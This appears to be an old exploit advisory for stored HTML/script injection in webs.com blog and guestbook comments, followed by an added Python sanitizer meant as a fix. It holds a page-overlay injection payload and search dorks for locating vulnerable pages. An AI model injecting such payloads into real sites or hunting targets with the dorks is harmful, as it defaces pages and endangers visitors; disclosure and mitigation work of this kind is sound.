Free Website Creator from webs.com suffers from cross-site scripting vulnerabilities.
5dcbb3def163d4bb7e6e9983a1c8a34e2db5060320d90d2d87fbfb5851d5c466
# Exploit Title: webs.com Free Website Creator APPs XSS/HTML Injection
# Date: 8/5/2010
# Author: isoz - http://bioworm.org/forum
# Software Link: http://webs.com
# Version: Any
# Tested on: Any OS
# CVE : -
# Code : [Example:]
Description:
Webs helps you make your own free website. Personal, group, and small
business websites complete with photos, videos, and ecommerce.
POC:
Go to a blog or guestbook and submit the example code in the comment
form.
Example:
<div style='top:0px;position:absolute;left:0px;width:900px;height:1800px;background-color:#000000;color:#FFFF00;text-align:center;'>
<embed src="evil">
Dorks:
inurl:"webs.com/apps/blog"
inurl:"webs.com/apps/guestbook"
350,000+ results
Greetz:
JMADD ;)
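
Mitigation sketch (added example, not part of the original advisory and not webs.com code): the comment forms render submitted markup as-is, so the fix is to pass every comment through an allowlist sanitizer before it is stored or displayed. The tag policy, class name and function name below are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy: a few inline formatting tags, nothing that positions or embeds.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
DROP_CONTENT = {"script", "style"}  # the text inside these is discarded too

class CommentSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        if self.skip or tag not in ALLOWED_TAGS:
            return  # div, embed, iframe, ... vanish together with their attributes
        attr = ""
        if tag == "a":  # href is the only attribute ever re-emitted
            href = dict(attrs).get("href") or ""
            try:
                ok = urlsplit(href).scheme in ("http", "https")
            except ValueError:  # malformed URL
                ok = False
            if ok:
                attr = ' href="%s" rel="nofollow noopener"' % escape(href, quote=True)
        self.out.append("<%s%s>" % (tag, attr))
        if tag != "br":
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in self.open_tags:
            while self.open_tags[-1] != tag:  # close unbalanced inner tags first
                self.out.append("</%s>" % self.open_tags.pop())
            self.out.append("</%s>" % self.open_tags.pop())

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize_comment(raw):
    """Return comment HTML reduced to the allowlist, with all text escaped."""
    parser = CommentSanitizer()
    parser.feed(raw)
    parser.close()
    # Close anything the commenter left open so it cannot swallow the page.
    parser.out.extend("</%s>" % t for t in reversed(parser.open_tags))
    return "".join(parser.out)
```

Run over the Example above, the unclosed full-page div and the embed element are dropped and only escaped text and allowlisted tags remain.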